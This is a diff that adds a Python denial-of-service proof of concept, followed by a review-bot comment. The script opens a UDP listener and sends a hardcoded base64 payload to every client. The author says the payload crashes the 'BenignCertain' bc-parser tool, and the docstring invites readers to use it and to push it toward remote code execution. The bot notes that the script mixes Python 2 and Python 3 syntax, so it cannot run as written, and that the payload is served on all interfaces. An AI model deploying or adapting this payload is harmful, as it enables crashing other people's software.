| 1 | +#!/usr/bin/python2 |
| 2 | +# coding: utf-8 |
| 3 | +# Author: Darren Martyn, Xiphos Research Ltd. |
| 4 | +# Licence: WTFPL - wtfpl.net |
| 5 | +""" |
| 6 | +DoubtfullyMalignant - BenignCertain DoS PoC |
| 7 | +
|
| 8 | +I know, I know, "No More DoS PoC's", however, upon having a more skilled |
| 9 | +at reverse engineering colleague at Xiphos examine the binary in IDA, |
| 10 | +it was determined that this bug is probably not exploitable to gain RCE. |
| 11 | +Either that or we just don't know how to do it :) |
| 12 | +
|
| 13 | +Anyway, I drop this PoC here for you, so you, too, can crash silly NSA |
| 14 | +toys. And maybe one of you clever folks can figure out what we missed to |
| 15 | +gain RCE? |
| 16 | +
|
| 17 | +Anyhow, how this all works is. You set it up listening on a port. |
| 18 | +When bc-id is ran against it, it responds with the crashing data. |
| 19 | +This will NOT crash bc-id, however, bc-id will write the data out |
| 20 | +to a file (serversipaddress.raw and serversipaddress.hex). |
| 21 | +When the parser (bc-parser) is ran on the created file, it will segfault |
| 22 | +because it is a hilariously badly coded piece of shit. |
| 23 | +
|
| 24 | +Hello to all fellow scientists of the glorious Rum Research Institute ;) |
| 25 | +
|
| 26 | +~ infodox // @info_dox |
| 27 | +""" |
| 28 | +import socketserver |
| 29 | +import sys |
| 30 | + |
| 31 | +def PointlessASCIIBanner(): |
| 32 | + print """\x1b[1;32m |
| 33 | +██████╗ ██████╗ ██╗ ██╗██████╗ ████████╗███████╗██╗ ██╗██╗ ██╗ ██╗ ██╗ |
| 34 | +██╔══██╗██╔═══██╗██║ ██║██╔══██╗╚══██╔══╝██╔════╝██║ ██║██║ ██║ ╚██╗ ██╔╝ |
| 35 | +██║ ██║██║ ██║██║ ██║██████╔╝ ██║ █████╗ ██║ ██║██║ ██║ ╚████╔╝ |
| 36 | +██║ ██║██║ ██║██║ ██║██╔══██╗ ██║ ██╔══╝ ██║ ██║██║ ██║ ╚██╔╝ |
| 37 | +██████╔╝╚██████╔╝╚██████╔╝██████╔╝ ██║ ██║ ╚██████╔╝███████╗███████╗██║ |
| 38 | +╚═════╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚══════╝╚══════╝╚═╝ |
| 39 | + |
| 40 | +███╗ ███╗ █████╗ ██╗ ██╗ ██████╗ ███╗ ██╗ █████╗ ███╗ ██╗████████╗██████╗ |
| 41 | +████╗ ████║██╔══██╗██║ ██║██╔════╝ ████╗ ██║██╔══██╗████╗ ██║╚══██╔══╝╚════██╗ |
| 42 | +██╔████╔██║███████║██║ ██║██║ ███╗██╔██╗ ██║███████║██╔██╗ ██║ ██║ ▄███╔╝ |
| 43 | +██║╚██╔╝██║██╔══██║██║ ██║██║ ██║██║╚██╗██║██╔══██║██║╚██╗██║ ██║ ▀▀══╝ |
| 44 | +██║ ╚═╝ ██║██║ ██║███████╗██║╚██████╔╝██║ ╚████║██║ ██║██║ ╚████║ ██║ ██╗ |
| 45 | +╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═════╝ ╚═╝ ╚═══╝╚═╝ ╚═╝╚═╝ ╚═══╝ ╚═╝ ╚═╝ |
| 46 | + \x1b[1;31mBecause when you mess with the best, you die like the rest.\x1b[0m""" |
| 47 | + |
| 48 | +class DoubtfullyMalignant(socketserver.BaseRequestHandler): |
| 49 | + def handle(self): |
| 50 | + # boom is a 110 byte response that kills bc-parser |
| 51 | + boom = "AQAAAAAAAAAAAAAAAAAAAIRZpwZtOxAAAgAAAHhWNBJ4VjQSeFY0Enh" |
| 52 | + boom += "WNBJ4VjQSeFY0EnhWNBJ4VjQSAAAAAAAAAADU2CEAAgAAADw8PDzMzM" |
| 53 | + boom += "zMmQAAAKWlpaWEAAAAAAAAAAAAAADt/q3eAAA=" |
| 54 | + sock = self.request[1] |
| 55 | + print "{+} Handling connection from %s" %(self.client_address[0]) |
| 56 | + sock.sendto(boom.decode("base64"), self.client_address) |
| 57 | + print "{*} Crashing Response Sent. Lets hope they run bc-parser on it ;)" |
| 58 | + |
| 59 | +def main(args): |
| 60 | + PointlessASCIIBanner() |
| 61 | + if len(args) != 2: |
| 62 | + sys.exit("use: %s listener_port" %(args[0])) |
| 63 | + try: |
| 64 | + print "{+} Launching Server on port: %s\nCTRL+C to kill me." %(args[1]) |
| 65 | + server = socketserver.UDPServer(("0.0.0.0", int(args[1])), DoubtfullyMalignant) |
| 66 | + server.serve_forever() |
| 67 | + except KeyboardInterrupt: |
| 68 | + sys.exit("{-} Killed. Shutting down.") |
| 69 | + |
| 70 | +if __name__ == "__main__": |
| 71 | + main(args=sys.argv) |
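Review bot: The script cannot run under the interpreter its shebang names: `import socketserver` (line 28) is the Python 3 module name, while the `print` statements (lines 32, 55, 57, 64) and `boom.decode("base64")` (line 56) are Python 2-only, so it fails with ImportError on python2 and with SyntaxError on python3. For the declared python2 target the one-line fix is `import SocketServer as socketserver`; a full port would instead use `base64.b64decode(boom)` and print functions. Separately, the handler replies to every UDP datagram that reaches the port, not only bc-id, and main() binds `0.0.0.0`, so anyone who probes the listener receives the payload — worth a comment on the bind line or a bind-address argument so it is not exposed on every interface by accident. The KeyboardInterrupt path also exits without `server.server_close()`, which is harmless for a one-shot PoC but should be noted in a comment.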